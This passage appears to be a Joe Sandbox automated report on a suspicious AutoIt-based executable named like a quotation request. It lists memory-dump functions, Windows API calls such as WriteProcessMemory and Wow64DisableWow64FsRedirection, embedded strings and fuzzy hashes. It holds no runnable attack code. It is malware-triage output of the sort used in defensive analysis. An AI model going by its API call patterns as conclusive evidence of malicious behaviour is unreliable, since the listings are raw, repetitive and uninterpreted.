                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                                • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                                                • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                                • MessageBeep.USER32(00000000), ref: 0045C226
                                                                                • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                                • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                                                • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 004013BF
                                                                                • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                                • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                                • DeleteObject.GDI32 ref: 00401401
                                                                                • StrokePath.GDI32(?), ref: 0040141C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                                • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                                APIs
                                                                                  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                                • __swprintf.LIBCMT ref: 00412ECD
                                                                                Strings
                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                • API String ID: 1943609520-557222456
                                                                                • Opcode ID: d816198c3568ef975599dd0e3500cea9c1fd863123ddcbb9d6b59a78db21c7ba
                                                                                • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                                • Opcode Fuzzy Hash: d816198c3568ef975599dd0e3500cea9c1fd863123ddcbb9d6b59a78db21c7ba
                                                                                • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                                APIs
                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container$%I
                                                                                • API String ID: 3565006973-4251005282
                                                                                • Opcode ID: d6bd7f8a32bfb2d5055e0ae8304c5b8736a500a65d2c31c18350615f30b3fc21
                                                                                • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                                • Opcode Fuzzy Hash: d6bd7f8a32bfb2d5055e0ae8304c5b8736a500a65d2c31c18350615f30b3fc21
                                                                                • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                  • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__87except__start
                                                                                • String ID: pow
                                                                                • API String ID: 2905807303-2276729525
                                                                                • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                                • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: 3cA$_A
                                                                                • API String ID: 4104443479-3480954128
                                                                                • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                                • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                                APIs
                                                                                  • Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F
                                                                                  • Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1
                                                                                  • Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
                                                                                  • Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
                                                                                  • Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                                                                • Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
                                                                                • Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                                                                • Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2326795674-1439706946
                                                                                • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                                • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                                • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                                                                • Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
                                                                                • Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                                                                • Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __calloc_crt
                                                                                • String ID: K$@BL
                                                                                • API String ID: 3494438863-2209178351
                                                                                • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                                • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
